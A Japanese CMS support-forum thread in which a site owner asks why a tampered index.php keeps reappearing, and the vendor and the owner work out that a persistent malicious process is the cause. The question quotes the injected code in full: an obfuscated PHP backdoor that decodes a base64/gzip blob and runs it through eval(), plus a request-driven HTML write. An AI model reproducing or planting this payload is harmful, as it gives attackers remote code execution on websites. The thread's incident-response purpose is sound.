index.phpが削除できません。

カテゴリ CMSの脆弱性や改ざんにつきまして
タイトル index.phpが削除できません。
質問者 FRさん (1510)
質問日時 2024/04/11 10:18 回答数 4
メディア共有 このエントリーをはてなブックマークに追加
質問内容

お世話になります。
脆弱性の問題で当サイトも影響を受けました。
サーバー側と問い合わせて一度全データを削除いたしましたが、
index.phpが削除できず、「$html = $_REQUEST["html"];」の2つの記述が存在するindex.phpが復活してしまう状態です。
それからその削除できないindex.phpには冒頭に
「<?php function csWUJ($xNSyb)
{
$xNSyb=gzinflate(base64_decode($xNSyb));
for($i=0;$i<strlen($xNSyb);$i++)
{
$xNSyb[$i] = chr(ord($xNSyb[$i])-1);
}
return $xNSyb;
}eval(csWUJ("lVXtbtowFH0AnsJDqAlSFDpN0yQQYxGYESkFloR1U9tZaTBgDZLIMR1VxbPvOk62AE1p+UFs33vOPbkfDkLwqwn++FSTKxYxklKha3OWJuvgkVDOY55qhhYvFlqzkzllZ4TTJOaCRUsdE8tx0C+EyXji233c7KDMD4iIYBtK1mzDhH6Zwxsu3cSCQhz+QDnqovpKiKTdam3TuTDDVby9D5bbgJkiTlosmtOdmaySeqem0CsazCkn4ZavARtwHjzq9S2QkWBJI9Gumw3iYfc7dm+0ke9PyQx2xPqKx752V0iYx5uARYBnqXzdI8QPMpy415Y7wAMymngSh3rorBNqI/1ZvkqOfzityG1jwda0e0Lj4m8z7Plk5tqS6OICVdjedYGqV2Fsn7yCi69d28dgdrQ7pUDJWFIBCe4e1sqs91jSrZtgtKd606xfZGoh4/IJW5VWeaBW+Tv140hAacjmHjIO4Blfj6CKeh7FKNe0mdeZQiOUkXnr7aCRwGUfBiJcIR3vQpoIFkeoQYtlU7VybV9bbKMwM5ZjlgLKXCnnRt5O8kFgCLIgmSU7gWLECdRDbgzUh2xNpjKnjoEaSvMZ1xG2Btg10OV5V9++wpOZb6APr3B2sT9zx75rjb2h5H9/HiLHIZsG4/ycvBgZAsqQX45ocsNrODzPIQC0hz+nWFINLcfDb4HJ+TmEsYWeFzev7LnCgOSiOAVQMe3zmyIQQdEYdEdDRVAWGa7jlB4cc9nWkcJ2jvpQDg56KrTCAY0edJW5vmND8ok91bIJTwUPg5SGm6TSzUDaNvodxX8irVmwZqpZoibtWVT+foiuU3qsoXyrweplJSfOb9Bzgq1Q5eKrCVxQ1mBQLebA53UaDiBHoU8v3/++p5dvyXYkr8LrZYEVoHJP5u2VcLokG3UPIq11czu/Ne+ePhnvP+5bmiHp4C+z0xRlH59ic3OpvjmyN3uf/wI="));?>」

という記述が必ず追加されてしまいます。
サーバー内で何度その3か所を削除しても削除してないindex.phpが復活します。
どうしたら良いでしょうか。

この質問の回答受付は終了しました

回答(4件)

回答者:
FRさん (1510)
回答日時:
2024/04/13 11:06

解決しましたのでご報告まで。

サーバーのコントロールパネルから、サーバーステータスを見ると、動作中のプロセス画面に怪しいプロセスがあったのでそちらを削除したら解決致しました。

回答者:
q19cms担当者さん (2341)
回答日時:
2024/04/11 10:42

はい、もちろんメールでもかまいません。

サーバー会社のほうで、単にファイルを削除しただけだと、その
様になる可能性があります。
「改ざんプロセスが動作しているようで、index.phpを削除して
も自動的に改ざんされたファイルが作成されてしまいます」
という内容で、対応をご依頼されるとよいと思います。
必要があれば、サーバー会社さんのほうに、当方の情報を
提供されてもかまいません。

回答者:
FRさん (1510)
回答日時:
2024/04/11 10:38

サーバーとやり取りして、ネット上のデータ全てを削除していただいた状態で、
再度新しくアップロードしなおそうとしたらその状態なのですが…。
htmlやjsは存在していません。
まっさらの状態です。
詳しくはメールでお問合せしてもよろしいでしょうか。

回答者:
q19cms担当者さん (2341)
回答日時:
2024/04/11 10:25

大変ご迷惑をおかけして申し訳ありません。

サーバーによっては、改ざんを続ける処理が動き続けている場合があり、
その場合、このような症状になります。

この場合は、コンテンツの初期化などを行ってから、すべてのファイルを
アップロードする方法が確実です。
この方法は、サーバーにより異なるので、サーバー会社の問い合わせ
窓口などにご相談いただき、その指示によりご対応をお願いいたします。

その際、サーバー上のファイはデータベースファイルを除いて、ダウンロード
されないようにお願いいたします。
htmlやjs、cssファイルなども改ざんされている可能性がございます。

不明点などありましたら、ここまたはお問い合わせ、メールなどで
お知らせください。
メール:cms@q19cms.com

4件中 1 ~ 4